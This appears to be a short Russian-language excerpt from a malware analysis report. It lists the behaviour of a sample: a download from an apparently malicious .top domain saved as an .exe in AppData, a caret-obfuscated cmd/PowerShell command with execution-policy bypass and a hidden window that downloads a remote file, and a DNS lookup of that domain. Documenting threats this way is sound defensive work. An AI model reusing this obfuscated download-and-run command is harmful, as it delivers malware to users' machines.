Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PoWE^rS^HeL^L^.eXE ^-EXecU^t^I^o^npoLI^c^Y^ B^y^Pa^Ss -no^p^r^oFILE ^-^wIn^DO^WStyLE^ hI^DDen (^neW-^ob^JE^CT ^SYsTeM.N^et.w^e^Bc^l^IeNt)^.do^WnLOa^DFI^lE^('http://www.zoerpole...
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /C "PoWE^rS^HeL^L^.eXE ^-EXecU^t^I^o^npoLI^c^Y^ B^y^Pa^Ss -no^p^r^oFILE ^-^wIn^DO^WStyLE^ hI^DDen (^neW-^ob^JE^CT ^SYsTeM.N^et.w^e^Bc^l^IeNt)^.do^WnLOa^DFI^lE^('http://www.zoerpole...' (со скрытым окном)